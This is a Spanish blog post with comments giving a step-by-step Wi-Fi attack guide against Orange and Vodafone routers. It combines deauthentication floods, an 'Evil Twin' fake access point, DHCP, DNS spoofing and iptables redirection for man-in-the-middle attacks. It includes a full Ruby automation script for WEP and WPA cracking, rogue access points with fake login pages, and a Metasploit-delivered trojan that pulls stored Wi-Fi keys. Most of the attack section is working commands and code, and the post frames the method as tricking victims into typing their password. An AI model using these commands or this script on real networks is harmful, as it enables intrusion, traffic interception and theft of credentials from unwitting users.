English plantillas curriculums vitae French cartas de amistad German documental Spain cartas de presentación Italian xo Dutch películas un link Russian templates google Portuguese foro de coches Japanese catálogos de Korean entrevistas a Arabic Chinese Simplified

TIENDAS WIFI:


Lo mejor en calidad-precio y rapidez bajo nuestra humilde opinión.
eiUFj

domingo, 21 de octubre de 2012

AUDITANDO REDES VODAFONEXXXX Y ORANGE-XXXX:




SOLUCIÓN 'PARCHE' A LAS REDES 'SEGURAS' DE ORANGE-XXXX Y VODAFONEXXXX EN EL PROCESO DE OBTENCIÓN DE LA CLAVE A LA FUERZA.

(BASADO EN LA GUERRA SICOLÓGICA)

USO: EN BACKTRACK 5

RESUMEN BREVE:

Te pones a capturar una red Orange o vodafone (La tuya por Dios para probar)

Te pones a desautentificar la red hasta no poder más ,todas las que puedas,haciendo pensar que SU wifi ha muerto...

Creas un AP falso con el nombre de la red en cuestión (AP-FAKE)

De tanto conectarse y desconectarse,reiniciará el router y ahí le pedirá la contraseña de la red....(La suya o la falsa)(Si cae en la falsa...está hecho)

Cuando la persona en cuestión  meta la pass, se le mete la contraseña y......

PREMIOOOOOOOOOOOOOOOOOOOOOOO!!!



Un punto de acceso a Internet utilizando algún software o también conocido como SoftAP, permite a otros usuarios usar nuestra conexión a Internet pasando por medio de nuestras interfaces de red, de esta forma, todos los paquetes que se envíen al punto de acceso pasarán por medio de nosotros, dado que no establecemos una clave a nuestra WIFI todos los usuarios podrán conectarse a ella sin ningún tipo de restricción (aunque se podría establecer claves WEP/WPA si así lo deseamos) sin embargo, el atractivo de tener la conexión sin ningún tipo de protección es que el número de clientes que accederán a ella será mayor, lo que nos permitirá ejecutar ataques MITM con una mayor cantidad de objetivos potenciales.
Por otro lado también es posible utilizar la técnica conocida como “Evil Twin” partiendo de los pasos detallados aquí, esta técnica consiste en la obtención de la clave WEP/WPA de un objetivo determinado partiendo de un ataque de denegación de servicio contra el AP objetivo y posteriormente estableciendo el mismo BSSID/ESSID del objetivo a nuestro softAP, de esta forma, parecería que son exactamente el mismo AP (en ocasiones este ataque normalmente viene acmpañado con el “Caffe Late Attack”), dado que se ha lanzado un ataque de denegación de servicio, el AP objetivo se encontrará fuera de servicio y los clientes que tengan activada la opción de conexión automática con el AP de la red Wifi, verán que se solicita nuevamente la clave WEP/WPA para establecer la conexión, realmente estarán enviando la contraseña al AP falso.
Los supuestos son:
La interface de red cableada: eth0
La interface de red inhalambrica: wlan0
La interface en modo monitor es: mon0
La Interface resultante del comando airbase (el softAP) es: at0
Los pasos a seguir son:
  1. Utilizar Aircrack-NG para poner la interface en modo monitor.

    >airmon-ng start wlan0
  2. Instalar el servidor DHCP y el servidor DNS (En el caso que no se encuentren instalados)

    >apt-get install dhcp3-server bind9
  3. Detener los servicios.

    >/etc/init.d/dhcp3-server stop
    >/etc/init.d/bind9 stop
  4. Configurar adecuadamente el servidor DHCP:

    Abrir el fichero /etc/dhcp3/dhcpd.conf y establecer los parámetros de la red que se va a crear y el mecanismo de asignación de direcciones IP a los clientes que se intenten conectar al AP, el fichero deberá contener algo similar a esto:
    ddns-update-style ad-hoc; 
    default-lease-time 600; 
    default-lease-time 7200; 
    authoritative; 
    subnet 192.168.2.128 netmask 255.255.255.128 { 
    option subnet-mask 255.255.255.128; 
    option broadcast-address 192.168.2.255; 
    option routers 192.168.2.129; 
    option domain-name-servers 192.168.1.1; 
    range 192.168.2.130 192.168.2.140;
}
Con esto definimos, los tiempos de respuesta máximos para la conexión
(default-lease-time, default-lease-time) también definimos los parámetros de la subred, indicando el rango ip inicial para la red y la mascara de red, posteriormente hay que definir opciones adicionales de la subred, tales como la mascara (que es la misma que la mascara de red definida), la dirección de broadcast, el router de la subred, el rango de ip disponibles para los clientes, (entre las direcciones 192.168.2.130 y 192.168.2.140) el atributo que resulta más interesante es el domain-name-server ya que se trata de la dirección IP del gateway que nos proporciona salida a internet, en una red domestica, el valor mas común es la dirección del router, ya que sin esto los clientes que se conecten a nuestro servidor no tendrán salida a Internet.
Finalmente es necesario establecer las interfaces que usará el servidor DHCP, para esto es necesario especificarlas en el fichero: /etc/default/dhcp3-server en la linea INTERFACES donde es necesario indicar la(s) interfaces, por ejemplo:
INTERFACES=”eth0 wlan0”
  1. Iniciar el softAP en nuestra máquina con:
    airbase-ng -I 100 -P -C 2 -c 3 –essid WIFI_COMPARTIDA mon0
    Opciones:

    -I : Indica el intervalo en mili segundos entre cada beacon.
    -P : Indica que el softAP responderá a todas las pruebas de broadcast sin importar el ESSID especificado.
    -C : El numero de segundos en los que el ESSID especificado también es beaconed
    -c : Indica el canal en donde estará el AP.
    –essid : Se trata del ESSID.

    NOTA: En algunas tarjetas inhalambricas, una vez el access point inicia, el canal que se establece es el 255, lo cual se puede comprobar con el uso de airodump-ng donde aparecerá el punto de acceso y su canal asociado, se se trata de un bug reportado, cuya solución se encuentra en el siguiente enlace: http://forum.aircrack-ng.org/index.php?topic=5755.0
  2. Una vez iniciado el airbase-ng, se crea automáticamente la interface at0, es necesario configurarla de la siguiente forma:
    >ifconfig at0 up
    >ifconfig at0 192.168.2.129 netmask 255.255.255.128
    >route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    De esta forma indicamos que la interface del softAP usará de los parámetros de red indicados en el fichero de configuración para el servidor DHCP, se ha levantado la interface en el primer comando, en el segundo se ha definido la dirección IP del gateway y la mascara de red, finalmente adicionamos el enrutamiento para la red 192.168.2.128 (128 se trata del ultimo segmento de la dirección de broadcast), la mascara de red y el gateway de la subred.
  3. Ahora podemos iniciar el servidor DHCP con los siguientes parámetros:
    >dhcp3 -d -f at0
    En el caso de que se produzca el siguiente error
    Can’t create PID file /var/run/dhcpd.pid: Permission denied.
    Es necesario crear un enlace simbolico apuntando al pid:
    >ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pidPosteriormente iniciar el servidor DNS:
    >/etc/init.d/bind9 start
  4. Con esto ya esta preparado, tenemos el servidor configurado en nuestra máquina esperando a que se conecten clientes, sin embargo, aun falta establecer determinados parámetros en las políticas de redirección y tratamiento de paquetes que pasan por nuestra maquina, para esto es necesario establecer las siguientes reglas en nuestro firewall iptables en local.
    iptables –flush 
    iptables –table nat –flush
    iptables –delete-chain
    iptables –table nat –delete-chain
    iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
    iptables –append FORWARD –in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    nano /etc/sysctl.conf 
    net.ipv4.conf.default.forwarding=1 net.ipv4.conf.all.forwarding=1

    Las opciones anteriormente indicadas contienen:

    Los 4 primeros comandos limpian las reglas del firewall para establecerlas.
    El 5 comando indica que el enrutamiento debe ser tratado por la interface de salida eth0 (Red Cableada) evidentemente debe de estar conectado el cable de red, sin embargo, si se desea se puede utilizar la red inhalambrica.
    El 6 comando indica que que se va a realizar el enrutamiento de los paquetes que llegan a la interfaz de entrada at0 (La interfaz correspondiente a nuestro SoftAP, por lo tanto las peticiones de todos los clientes que se conecten a él) se especifica que todos los paquetes van a ser aceptados.
    Finalmente las ultimas lineas corresponden al enrutamiento como tal, es necesario especificar la ruta del gateway para peticiones udp, los últimos parámetros son necesarios para permitir el enrutamiento de las peticiones.
    Eso es todo, ahora tenemos nuestro Fake AP funcionando, ahora es posible utilizar diferentes tipos de ataques a los clientes conectados. Como por ejemplo ataques MITM y el uso de KarmetaSploit que se verá con un buen nivel de detalle en una próxima entrada, donde podremos ver como utilizar MetaSploit Framework y los conceptos teóricos y prácticos aquí expuestos.

    SCRIPT DEL PROCESO TRADUCIDO AL ESPAÑOL:
    #!/usr/bin/env ruby

     def menu 
      puts "##################    Coded By Flow (Koala)            #######"
      puts "##################                                     #######"
      puts "                  #########################                   "
      puts "                        #############                         "
      puts "                            #####                             "
      puts "                              #                               "
      puts "~~~~~~~~~~~~~~~~~~ 0 -Instalación de los elementos          ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de llave WEP mediante inyección    ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de llave WEP mediante -p0841       ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de llavee WPA con diccionario         ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 4 -Crack WPA con rogue AP y pagina fake    ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 5 -Crack WPA con rogue AP y WKV      ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 6 -Caja de herramienta         ~~~~"
    end
    menu
    opt=""
          while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6")
          puts "Opción elegida (entre 0 y 6)"
          opt=gets.chomp
    end

          if(opt=="0")
          puts "Se esta iniciando la instalación de los elementos necesarios al Rogue. Gracias por esperar y no interrumpir el proceso. Se le pedirá probablemente confirmación para instalar los nuevos paquetes. Si es así entrar «Y» para «Yes» y «S» para «si»."
          sleep 10
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
          sleep 60
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
          sleep 90
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
          sleep 90
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
          sleep 150
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
    `sudo a2enmod php5`
    `sudo service apache2 restart`
    end
    menu

          if(opt=="1")
          puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
          sleep 5
    `airmon-ng start wlan0`
    system ("ifconfig")
          puts "Entrar dirección MAC de su dispositivo wireless"
    mac=""
    mac=gets.chomp
    $mac=mac

          puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
          sleep 5
          system ("airodump-ng --encrypt wep mon0")
          puts "Nombrar el fichero de captura"
    nombre=""
    nombre=gets.chomp
    $nombre=nombre

          puts "Entrar el nombre de la red (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid

         puts "Entrar el numero del canal de la red (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch

         puts "Entrar la dirección MAC de la red (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid


    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
    sleep 5
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &")
    sleep 1800
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nombre}-01.cap &> /dev/null &")
    end

         if(opt=="2")
         puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
    sleep 5
    system ("ifconfig")
         puts "Entrar la dirección MAC de su dispositivo wireless"
    mac=""
    mac=gets.chomp
    $mac=mac

         puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
    sleep 5
    system ("airodump-ng --encrypt wep mon0")
         puts "Nombrar el fichero de captura"
    nombre=""
    nombre=gets.chomp
    $nombre=nombre

         puts "Entrar el nombre de la red (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid

         puts "Entrar el numero del canal de la red (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch

         puts "Entrar la dirección MAC de la red (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid


    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
    sleep 5
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
    sleep 1800
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nombre}-01.cap &> /dev/null &")
    end


         if(opt=="3")
         puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Nombrar el fichero de captura"
    nombre=""
    nombre=gets.chomp
    $nombre=nombre

         puts "Entrar nombre de la red (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid

         puts "Entrar numero del canal de la red (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch

         puts "Entrar la dirección MAC de la red (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid

         puts "Entrar la dirección MAC del cliente conectado a la red (STATION)"
    station=""
    station=gets.chomp
    $station=station


    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
    sleep 18
    rep=""
         while rep!="si" && rep!="no"
         puts "¿El handshake ha sido recuperado? si/no"
    rep=gets.chomp
         if rep=="si"
    puts "Entrar el nombre del diccionario a utilizar"
    dico=""
    dico=gets.chomp
    $dico=dico

    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")

         elsif rep=="no"
         puts "Iniciando mdk3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &")
    sleep 40
         puts "Ahora escribir el nombre del diccionario a emplear"
    dico=""
    dico=gets.chomp
    $dico=dico

    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nombre}.cap &> /dev/null &")
    else 
         puts "Elegir una respuesta valida"
          end
       end
    end


         if(opt=="4")
         puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Entrar el nombre de la red (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid

         puts "Entrar bel numero del canal de la red (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch

         puts "Entrar la dirección de la red (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid

         puts "Creación de la rogue AP"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
    sleep 3
    `ifconfig at0 up`
    `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
    `ifconfig at0 mtu 1400`
    `echo > dhcpd.leases`
    `iptables --flush`
    `iptables --table nat --flush`
    `iptables --delete-chain`
    `iptables --table nat --delete-chain`
    `route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
    `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
    `iptables -P FORWARD ACCEPT`
    `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
         puts "Reglas iptables establecidas, reiniciando dhcp3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
         puts "Puesta en funcionamiento de apache y dnsspoof"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
         puts "Iniciando wireshark"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
    sleep 5
    down=""
         while down!="si" && down!="no"
    puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo  para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige?  mdk3/airbase"
    down=gets.chomp

         if down=="mdk3"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")

         elsif down=="airbase"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
    puts "¿Volver al menú?"
    rp=gets.chomp
    else
         puts "Eligir una respuesta valida"
         end
      end
    end


         if(opt=="5")
         puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Entrar el nombre de la red (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid

         puts "Entrar el numero del canal de la red (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch

         puts "Entrar la dirección MAC de la red (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid

         puts "Creación de la rogue AP"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch}-e #{$essid} mon0 &> /dev/null &")
    sleep 3
    `ifconfig at0 up`
    `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
    `ifconfig at0 mtu 1400`
    `echo > dhcpd.leases`
    `iptables --flush`
    `iptables --table nat --flush`
    `iptables --delete-chain`
    `iptables --table nat --delete-chain`
    `route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
    `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
    `iptables -P FORWARD ACCEPT`
    `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
         puts "Reglas iptables establecidas, reiniciando dhcp3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
         puts "Puesta en funcionamiento de apache y dnsspoof"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
         puts "Implementado troyano"
    sleep 3
    `cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe`
    Dir.chdir '/root/metasploit'
    `cd /root/metasploit`
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &")
    sleep 5
    down=""
         while down!="si" && down!="no"
    puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo  para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige?  mdk3/airbase"
    down=gets.chomp

         if down=="mdk3"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")
         elsif down=="airbase"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
    else
    puts "Elegir una respuesta valida"
        end
      end
    end


         if(opt=="6")
    puts "1 -Editar los ficheros esenciales al crack"
    puts "2 -Editar les ficheros log de apache"
    puts "3 -Hacer un Rogue transparente permitiendo que el cliente de la red objetivo pueda navegar en la red"
    puts "4 -Hacer un listado de los ficheros y derechos respectivos en dans /var/www"
    eleccion=""
         while eleccion!="1" && eleccion!="2" && eleccion!="3"
    eleccion=gets.chomp

         if eleccion=="1"
    `gedit /etc/dhcp3/dhcpd.conf`
    `gedit /root/dns.txt`

         elsif eleccion=="2"
    `gedit /var/log/apache2/access.log`
    `gedit /var/log/apache2/error.log`

         elsif eleccion=="3"
         puts "Efectuando escaneo de redes. Una vez elegido el objetivo prensar Ctrl+c para seguir adelante"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Entrar nombre la red (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid

         puts "Entrar numero de canal de la red (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch

         puts "Entrar dirección MAC de la red (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid

         puts "Creación del rogue AP"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
    sleep 3
    `ifconfig at0 up`
    `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
    `ifconfig at0 mtu 1400`
    `echo > dhcpd.leases`
    `iptables --flush`
    `iptables --table nat --flush`
    `iptables --delete-chain`
    `iptables --table nat --delete-chain`
    `iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
    `iptables --append FORWARD --in-interface at0 -j ACCEPT`
    `iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1`
         puts "Reglas iptables establecidas, reiniciando dhcp3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
    puts "La victima puede ahora navegar en la red; ¡no sean mal@s! :)"
    sleep 5

         elsif choix=="4"
         puts "Los ficheros presentes son:"
    sleep 3
    system ("ls -l /var/www")
        end
      end
    end
    system ("ruby Securethis.rb")
      

    NOTA(S)
      , El mode monitor se activa con el opción 1, si no queréis usar el opción 1 lo hacéis a mano en un shell a parte  con el clásico
    Código: [Seleccionar]
    sudo airmon-ng start <interfaz>
      



9 comentarios:

  1. ¿PODÍAIS EXPLICARLO "PARA TONTOS"?

    GRACIAS

    ResponderEliminar
    Respuestas
    1. http://www.youtube.com/watch?v=vy4leX_twTw Echale un vistazo a esto...sobre el FAKE-AP muy util!!

      Eliminar
  2. ey tio felicidades!.lo proximo el pentagono.......jejeje.
    no de verdad, increible fantastico trabajo excelente,muchas gracias por el aporte

    ResponderEliminar
  3. que alguien haga un video y lo explique mejor. capto la idea pero no se como hacerlo :(

    ResponderEliminar
    Respuestas
    1. http://www.youtube.com/watch?v=vy4leX_twTw Echale un vistazo a esto...sobre el FAKE-AP muy util!!

      Eliminar
  4. http://www.youtube.com/watch?v=vy4leX_twTw Echale un vistazo a esto...sobre el FAKE-AP muy util!!

    ResponderEliminar
  5. alguien puede hacer un video en español. tengo que crear una ap falsa igual pero como me llega a mi la clave??... me parece que estoy muy perdido!! :,(

    ResponderEliminar
  6. si porfavor que alguien haga un tutorial mas claro! para tontos jejeje

    ResponderEliminar
  7. pues yo cuando reinicio mi router no me pide que vuelva a meter la pass... en todo caso cuando se RESETEA pero NO CUANDO SE REINICIA.

    ResponderEliminar